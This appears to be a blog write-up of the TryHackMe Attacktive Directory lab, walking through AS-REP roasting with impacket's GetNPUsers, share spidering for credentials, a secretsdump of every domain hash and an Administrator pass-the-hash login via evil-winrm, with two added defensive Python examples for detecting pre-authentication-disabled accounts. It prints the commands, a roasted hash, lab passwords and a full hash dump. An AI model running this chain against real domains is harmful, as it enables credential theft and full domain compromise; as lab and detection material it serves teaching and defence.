A First Look at AS-REP Roasting

Background

This is my first contact with domain penetration; before this I had also got a feel for it through two HTB boxes. I found it quite interesting, and the principle behind this AS-REP Roasting attack is also very simple.

Prerequisites

To exploit AS-REP Roasting, Kerberos pre-authentication must first be disabled for the account in question,

and we must already have a host or user inside the domain that can communicate with the KDC.

How it works

Because Kerberos enables pre-authentication by default, when a client asks the Key Distribution Center (KDC) to issue a TGT (Ticket Granting Ticket) it sends Pre-Authentication data along with the request. That data contains an encrypted timestamp, which the AS decrypts with the user's hash to confirm that the identity is genuine. If verification succeeds, the AS returns the TGT and a session key in the AS_REP; the part of the reply carrying the session key is encrypted with a key derived from the user's password, so it could in principle be brute-forced offline to recover that password.

Now suppose pre-authentication is disabled (i.e. DONT_REQ_PREAUTH is set). After the client sends an AS_REQ there is no encrypted timestamp, so no identity check takes place and the KDC directly returns the AS_REP response containing the TGT and the session key. That reply can then be brute-forced to recover the user's password.

Target machine

The target this time is THM's Attacktive Directory.
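From the defender's side, every AS-REP handed out this way is visible on the domain controller as Security event 4768 with Pre-Authentication Type 0. The following Python triage is an added example (not code from the original post); it runs over constructed 4768-style records, flags TGTs issued without pre-authentication (and whether they used RC4, the etype behind the $krb5asrep$23$ format), and also surfaces the burst of unknown-principal failures that user enumeration with a tool like kerbrute leaves behind. The IP addresses and the user names other than svc-admin and james are placeholders.

```python
"""Triage Windows Security event 4768 records for AS-REP roasting activity.

Added example, not code from the original post. Records are constructed
dicts in the shape of the EventData fields of Event ID 4768 (Kerberos
authentication ticket (TGT) requested). PreAuthType 0 means the TGT was
issued without pre-authentication; TicketEncryptionType 0x17 is RC4-HMAC,
the etype behind the $krb5asrep$23$ format produced by GetNPUsers.py.
"""
from collections import Counter

TGT_REQUESTED = 4768
NO_PREAUTH = 0
RC4_HMAC = 0x17
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768 status for a user that does not exist

# Constructed sample events; the IPs and the names other than svc-admin/james are placeholders.
EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-admin", "IpAddress": "::ffff:10.0.0.5",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc-test", "IpAddress": "::ffff:10.0.0.5",
     "TicketEncryptionType": 0x12, "PreAuthType": 0, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "james", "IpAddress": "::ffff:10.0.0.9",
     "TicketEncryptionType": 0x12, "PreAuthType": 2, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "nosuchuser1", "IpAddress": "::ffff:10.0.0.5",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": "0x6"},
    {"EventID": 4768, "TargetUserName": "nosuchuser2", "IpAddress": "::ffff:10.0.0.5",
     "TicketEncryptionType": 0x17, "PreAuthType": 0, "Status": "0x6"},
    {"EventID": 4769, "TargetUserName": "james", "IpAddress": "::ffff:10.0.0.9",
     "TicketEncryptionType": 0x12, "Status": "0x0"},          # TGS request, out of scope
]

def roast_hits(events):
    """TGTs issued (Status 0x0) with no pre-authentication: each one handed the
    requester an AS-REP that can be cracked offline. Returns (user, source, reasons)."""
    hits = []
    for ev in events:
        if ev["EventID"] != TGT_REQUESTED or ev["Status"] != "0x0" or ev.get("PreAuthType") != NO_PREAUTH:
            continue
        reasons = ["TGT issued without pre-authentication"]
        if ev["TicketEncryptionType"] == RC4_HMAC:
            reasons.append("RC4-HMAC reply (etype 0x17) is keyed from the NT hash and cheap to crack")
        hits.append((ev["TargetUserName"], ev["IpAddress"], reasons))
    return hits

def enumeration_sources(events, threshold=2):
    """Sources with at least `threshold` 4768 failures for unknown principals: the
    footprint of kerbrute-style user enumeration that usually precedes a roast."""
    counts = Counter(ev["IpAddress"] for ev in events
                     if ev["EventID"] == TGT_REQUESTED and ev["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

A 4768 with Pre-Authentication Type 0 is only ever produced for accounts that have DONT_REQ_PREAUTH set, so in a domain where no account should have it, a single hit is worth an alert.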

┌──(root㉿vbox)-[/tmp]
└─# nmap -Pn -n --min-rate=10000 -sCV -p- $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 15:25 CST
Warning: 10.10.170.234 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.170.234
Host is up (0.54s latency).
Not shown: 51913 closed tcp ports (reset), 13601 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 07:25:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-06-01T07:26:55+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-05-31T07:24:38
|_Not valid after: 2025-11-30T07:24:38
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-06-01T07:26:46+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-06-01T07:26:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.90 seconds

The port scan shows 139/445 open; next, use kerbrute to enumerate users.

Information gathered so far

ip:10.10.170.234

domain-name: spookysec.local

Enumerating domain users

The user svc-admin exists.

We do not yet know this user's password, so try an AS-REP Roasting attack.

AS-REP Roasting: obtaining the user's hash

Information gathered so far

ip:10.10.170.234

domain-name: spookysec.local

Domain-User:svc-admin

Run the attack with GetNPUsers.py from impacket.

┌──(root㉿vbox)-[/tmp]
└─# python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/svc-admin -no-pass
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:c9dc5df9d949949f23a6839236c366b8$99de4225b8456a330c86e8cbb76498bc4e628a46cef1a0643445d735040611cb6589484fddb783990165d94b9b6d1cd69f5b029f4f5d56732a0a7f7952bc30abf1ec868434f27e5eb3ce8b6111eedbf6c3e66a2e237080e58ab806f73339069b92a3a8c9f7f4c4ef225f0db24cb6df212df6307507bd8e928e9599d96e9878b17607e47cbc467717be9504dacbd73b2e7cac8ba717c2bfa36922c607386fb3523e9ade1903c8b8357a29a30dca002ab8002b0b241e0ef64437ec2da353b026d048da84a3d6dc9b55e3f3b0d854ceda7841018e485f3653b1669eac8b94924f317d0b757f8739d4581f458b1403c9eef09a8e

We have the hash; crack it with hashcat.

With the recovered password we can use bloodyAD to confirm that this user really does have pre-authentication disabled.

bloodyAD --host $ip -d spookysec.local -u svc-admin -p management2005 get object 'svc-admin'

The userAccountControl attribute does contain DONT_REQ_PREAUTH, which proves that pre-authentication is not enabled; that is exactly why we were able to obtain the user's hash.

Obtaining the backup user's credentials from an SMB share
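The bloodyAD check above inspects one account at a time. As an added example (not from the post or from bloodyAD), the following Python audit decodes userAccountControl for a constructed list of accounts and lists every enabled account with the DONT_REQ_PREAUTH bit (0x400000) set; the flag values are the documented UF_* bits, and the account list and its values are constructed.

```python
"""Audit userAccountControl values for accounts that skip Kerberos pre-authentication.

Added example, not from the original post or from bloodyAD. Flag values are the
documented userAccountControl bits; the directory excerpt below is constructed.
"""

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x0002

def decode_uac(value: int) -> list[str]:
    """Names of the flags set in a userAccountControl integer; bits not in the table are reported as hex."""
    names = [name for bit, name in UAC_FLAGS.items() if value & bit]
    unknown = value & ~sum(UAC_FLAGS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:x}")
    return names

def preauth_disabled_accounts(entries):
    """entries: iterable of (sAMAccountName, userAccountControl).
    Returns [(sAMAccountName, decoded flags)] for enabled accounts with DONT_REQ_PREAUTH set.
    Disabled accounts are skipped: the KDC refuses to issue them a TGT, so they yield no AS-REP."""
    findings = []
    for sam, uac in entries:
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            findings.append((sam, decode_uac(uac)))
    return findings

# Constructed directory excerpt (values are illustrative, not read from the target).
SAMPLE = [
    ("svc-admin", 0x400200),   # NORMAL_ACCOUNT | DONT_REQ_PREAUTH, the condition bloodyAD showed
    ("backup",    0x010200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD, pre-auth still required
    ("old-svc",   0x400202),   # DONT_REQ_PREAUTH but ACCOUNTDISABLE, not a live finding
]

if __name__ == "__main__":
    for sam, flags in preauth_disabled_accounts(SAMPLE):
        print(f"{sam}: {', '.join(flags)}")
```

In a real audit the (sAMAccountName, userAccountControl) pairs would come from an LDAP query filtered on userAccountControl:1.2.840.113556.1.4.803:=4194304, the bitwise-AND matching rule for that bit.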

ip:10.10.170.234

domain-name: spookysec.local

Domain-User:svc-admin

Domain-User-svc-admin-Pass:management2005

Now that we hold a domain user's credentials, we can enumerate the SMB shares and see which ones we can act on.

┌──(root㉿vbox)-[/tmp]
└─# netexec smb $ip -u svc-admin -p management2005 --shares
SMB 10.10.170.234 445 ATTACKTIVEDIREC [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB 10.10.170.234 445 ATTACKTIVEDIREC [+] spookysec.local\svc-admin:management2005
SMB 10.10.170.234 445 ATTACKTIVEDIREC [*] Enumerated shares
SMB 10.10.170.234 445 ATTACKTIVEDIREC Share Permissions Remark
SMB 10.10.170.234 445 ATTACKTIVEDIREC ----- ----------- ------
SMB 10.10.170.234 445 ATTACKTIVEDIREC ADMIN$ Remote Admin
SMB 10.10.170.234 445 ATTACKTIVEDIREC backup READ
SMB 10.10.170.234 445 ATTACKTIVEDIREC C$ Default share
SMB 10.10.170.234 445 ATTACKTIVEDIREC IPC$ READ Remote IPC
SMB 10.10.170.234 445 ATTACKTIVEDIREC NETLOGON READ Logon server share
SMB 10.10.170.234 445 ATTACKTIVEDIREC SYSVOL READ Logon server share

Four shares are readable; use the spider_plus module to download every readable file.

┌──(root㉿vbox)-[/tmp]
└─# netexec smb $ip -u svc-admin -p management2005 -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=10000
SMB 10.10.170.234 445 ATTACKTIVEDIREC [*] Windows 10 / Server 2019 Build 17763 x64 (name:ATTACKTIVEDIREC) (domain:spookysec.local) (signing:True) (SMBv1:False)
SMB 10.10.170.234 445 ATTACKTIVEDIREC [+] spookysec.local\svc-admin:management2005
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] STATS_FLAG: True
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] MAX_FILE_SIZE: 9.77 KB
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB 10.10.170.234 445 ATTACKTIVEDIREC [*] Enumerated shares
SMB 10.10.170.234 445 ATTACKTIVEDIREC Share Permissions Remark
SMB 10.10.170.234 445 ATTACKTIVEDIREC ----- ----------- ------
SMB 10.10.170.234 445 ATTACKTIVEDIREC ADMIN$ Remote Admin
SMB 10.10.170.234 445 ATTACKTIVEDIREC backup READ
SMB 10.10.170.234 445 ATTACKTIVEDIREC C$ Default share
SMB 10.10.170.234 445 ATTACKTIVEDIREC IPC$ READ Remote IPC
SMB 10.10.170.234 445 ATTACKTIVEDIREC NETLOGON READ Logon server share
SMB 10.10.170.234 445 ATTACKTIVEDIREC SYSVOL READ Logon server share
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.10.170.234.json".
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] SMB Shares: 6 (ADMIN$, backup, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] SMB Readable Shares: 4 (backup, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Total folders found: 25
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Total files found: 6
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] File size average: 1.44 KB
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] File size min: 22 B
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] File size max: 4.07 KB
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] File unique exts: 4 (ini, txt, pol, inf)
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Downloads successful: 1
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Unmodified files: 5
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [*] Updated files: 1
SPIDER_PLUS 10.10.170.234 445 ATTACKTIVEDIREC [+] All files processed successfully.

backup@spookysec.local:backup2517860

This gives us a second user's credentials.

According to the room description, the backup user is the domain controller's backup account.

Dumping every user's hash with secretsdump

ip:10.10.170.234

domain-name: spookysec.local

Domain-User:svc-admin,backup

Domain-User-svc-admin-Pass:management2005

Domain-User-backup-Pass : backup2517860

┌──(root㉿vbox)-[/tmp]
└─# python3 /opt/impacket/examples/secretsdump.py -dc-ip $ip -target-ip $ip backup@spookysec.local
Impacket v0.13.0.dev0+20250530.173014.ff8c200f - Copyright Fortra, LLC and its affiliated companies

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:17960b8793202667f0c3d990b754297f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:868008ebcd155cdfdb430fbb2558a4d6879baf00e3f63682acd3c170dac61171
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:2a3f24b7c074c7b9892e9f228fba9bc5
ATTACKTIVEDIREC$:des-cbc-md5:4a2c315e9419b34f
[*] Cleaning up...

With the Administrator NT hash in hand, log in over WinRM (evil-winrm's -H option passes the hash instead of a password).

┌──(root㉿vbox)-[/tmp]
└─# evil-winrm -i $ip -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Original post: https://r3bir7hcx.github.io/2025/06/01/AS-REP-Roasting初探/
Author: CXCX
Posted on June 1, 2025